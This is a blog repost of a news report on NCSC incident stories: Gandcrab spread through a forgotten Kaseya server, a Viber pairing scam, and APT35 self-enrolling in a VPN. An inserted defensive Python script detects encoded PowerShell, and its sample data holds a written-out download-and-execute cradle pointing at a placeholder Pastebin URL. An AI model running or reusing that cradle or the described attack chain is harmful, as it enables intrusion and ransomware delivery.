http://blog.extremehacking.org/blog/2019/04/30/powershell-the-gandcrab-infection-and-the-long-forgotten-server/
Submission: On April 27 via api from US — Scanned from DE
Powershell, the Gandcrab infection and the long-forgotten server

Credits: The Register

CyberUK 2019

If your hair isn’t already grey enough, GCHQ staff have revealed a handful of infosec incidents that, in their words, “surprised us”.

During a talk at CyberUK 2019, the annual shindig of the spy agency’s public-facing offshoot, the National Cyber Security Centre (NCSC), a bespectacled and bearded chap who was introduced only as “Toby L” told an enthralled audience one of his “favourite war stories”.

The NCSC is part of GCHQ’s drive since 2013 to rebuild public trust and convince industry that the government is also interested in their economic wellbeing. As part of that, NCSC occasionally gets called in to help with particularly pernickety problems involving malware infections on corporate networks.

“This specific instance of Gandcrab was not the most exciting,” said “Toby”. “It’s ransomware that’s relatively well-understood in the community. It’s relatively easy to recover from one of those compromises. It’s not the ransomware that’s interesting, though, but how it got where it was.”

A look over the company’s logs revealed that Gandcrab had been introduced via a download from Pastebin – an encoded Base64 binary summoned through a Powershell command, no less.

“Base64 on Powershell is a perfectly legit function. It provides a mechanism to run your Powershell scripts without a dedicated commandlet or a dedicated script file,” commented Toby. “It does look pretty weird and dodgy when you’ve got encoded commands being sent to Powershell but it’s a legitimate use of it.”

What ran Powershell, then? NCSC traced that back to a file called agentmon.exe – and this was where it got interesting.

“It’s a legit file from Kaseya, an IT vendor. They sell products that allow remote management monitoring. If you have an outsourced IT vendor managing your network remotely from their office somewhere in the world, chances are they use a tool like Kaseya. They log into your network, access controls on RDP [remote desktop], SSH, whatever you might be using. Coming in through a backdoor if you like, a custom protocol.”

Agentmon.exe was running on that particular network with system-level privs, deploying Powershell commands across it daily – “adding to the noise ratio a bit”, as Toby put it.

Digging into Kaseya’s logs revealed something even more intriguing: the server issuing the commands had been run by an outsourced IT provider, and that provider’s contract with the infected company had ended quite a while ago.

CVE-2017-18362 explained half the story. The critical vuln allows anyone with access to the Kaseya server’s ManagedIT.asmx page through its web interface to execute arbitrary SQL queries. As Toby put it: “No whitelisting, no blacklisting, no password entry… send SQL commands and HTTP POST and it’ll just run it.”

But Powershell? Easy if you know about CVE-2018-20753, which allows (yup, you guessed it) unprivileged remote attackers to execute Powershell payloads on all managed devices.

When the external MSP’s contract had ended, post-contract cleanup by both parties hadn’t included the Kaseya deployment on all the devices across the network.
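Toby’s point is that the Base64 encoding is legitimate on its own, so a defender has to decode the command and judge its content. As an added illustration (not code from the article, NCSC or Kaseya), the Python below decodes the -EncodedCommand argument of constructed process-creation events and flags the decoded script on content indicators such as a Pastebin download cradle; the event fields, the agentmon.exe parent path and the Pastebin URL are assumptions built for the sample.

```python
import base64
import re
# PowerShell accepts abbreviations of -EncodedCommand; this covers the ones commonly seen.
ENC_SWITCH = re.compile(r"(?i)\s[-/]e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)")

# Content-level indicators, matched against the DECODED script rather than the encoding itself.
INDICATORS = {
    "pastebin": re.compile(r"pastebin\.com", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile", re.I),
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "nested-base64": re.compile(r"frombase64string", re.I),
}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell expects base64 over the UTF-16LE bytes of the script.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events):
    """Decode each event's encoded command and record which indicators its content matches."""
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is None:
            continue  # no encoded command: nothing to decode here
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        # Parent image is context only: an RMM agent spawning PowerShell is noisy, not proof.
        findings.append({"pid": ev["ProcessId"], "parent": ev.get("ParentImage", ""),
                         "decoded": decoded, "indicators": hits, "suspicious": bool(hits)})
    return findings

def encode_ps(script):
    """Used only to build the constructed sample events below (inverse of the decoder)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

AGENT = r"C:\Program Files\Kaseya\agentmon.exe"  # constructed sample events below, not real logs
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": AGENT, "CommandLine": "powershell.exe -NoP -W Hidden -enc "
        + encode_ps("Get-Service | Out-File C:\\rmm\\svc.txt")},
    {"ProcessId": 4133, "ParentImage": AGENT, "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
        + encode_ps("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')")},
    {"ProcessId": 4150, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]
```

Running `triage(SAMPLE_EVENTS)` leaves the routine agent job as benign and flags only the second event, whose decoded content pulls a script from Pastebin, which is the distinction Toby is drawing.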
Left unpatched, unoperated and unremembered, the Kaseya server had been found by a baddie who’d made use of two relatively old CVEs to compromise the entire network and distribute ransomware across it.

“One of those weird tech issues,” shrugged Toby.

MALWARELESS MALIGNANCY

Another NCSC bod, “Harry W”, as equally descript as his colleague Toby, took to the podium.

An executive at a company got a WhatsApp invite to a conference call from a personal assistant. After establishing comms, the PA said: “We use Viber [another cross-platform VoIP app] now.”

“It’s a legitimate product,” said Harry. “A perfectly fine messaging platform.”

The PA sent the exec a crafted link. But this was no URL made up of dodgy ASCII lookalike characters, or substituting 1 for I, or even to a suspect domain. This was a URL to viber.com/activate-secondary/[string of random characters].

“Activate secondary is a very specific feature of Viber,” said Harry. “It allows you to sync your Viber accounts on one device with another; for example, a desktop. You can sync messages between different systems. Make phone calls off one and send messages off the other. Enables users to use it a bit more flexibly.”

A useful feature, then. For both good and bad users.

“What we saw was a number of individuals in this organisation who did click this link,” said Harry. “They would activate secondary, paired their device with another – I think it was on the African continent somewhere. What happens? Full address book popped over. Not just the Viber address book; the entire address book on the phone. You might have personal info on there about job titles. Makes the next pivot for social engineering that bit easier.”

It gets worse.

“If you’ve paired your device, it also allows you to spoof phone calls as the person you’ve just synced with,” revealed Harry. “The attacker can now use your caller ID. If you’ve got a credit card synced, you can make Viber-to-landline calls – much more lucrative! You can also, rather than just ringing friends, ring your own 091 hotline number to bring in extra money.”

“Malwareless,” he continued. “It wasn’t using anything particularly sophisticated, but still, a really interesting channel in which they were trying to get that extra information from targets.”

As he pointed out, no mobile device management platform would have picked up this attack; Viber is a legitimate messaging app present in the various app stores. “Again, when you’ve got legit functions from an app, how can you monitor and detect those?”

SECURITY LOCKING OUT YOUR ATTACK? NEVER MIND – JUST ENROL FOR A COMPANY VPN

Another cautionary tale came from an attack by Iran-based hacking crew APT35, aka “Newscaster”. The targeted company had been hit a couple of months previously. Diligently, the firm did all the right things: beefed up security, briefed non-techie staff on things to do and not to do, and the rest of it. All exactly by the book.

Except for their VPN implementation. Users across the company were told to register for access to the new company-wide VPN. No VPN, no access to business-critical stuff. The VPN itself was protected by 2FA.

“What they had missed out was the enrolment to the 2FA VPN authentication was initiated by the users,” said the NCSC bod. “Not all users, particularly those based in offices, need 2FA. So they didn’t enrol, right? All the [threat] actor did was target a bunch of accounts, figure out a user who wasn’t enrolled and then enrolled themselves instead.”

The hackers were literally signing themselves up to the new access-all-areas corporate VPN. They were eventually discovered and shut out again, but not before they had gained access to a critical proof-of-concept deployment where access had been locked down to just four specific accounts.

--------------------------------------------------------------------------------

As well as telling some fascinating stories, the point of this session was a bit wider: NCSC, even as an arm of GCHQ, is getting out there and helping industry with its infosec headaches. While some chunks of industry will doubtless need a lot more convincing than this to give people from a state spy agency access to their sensitive internal networks, it’s a real shift from the days of 2013 and the Snowden revelations.

By Sadik Shaikh | April 30th, 2019 | Cyber News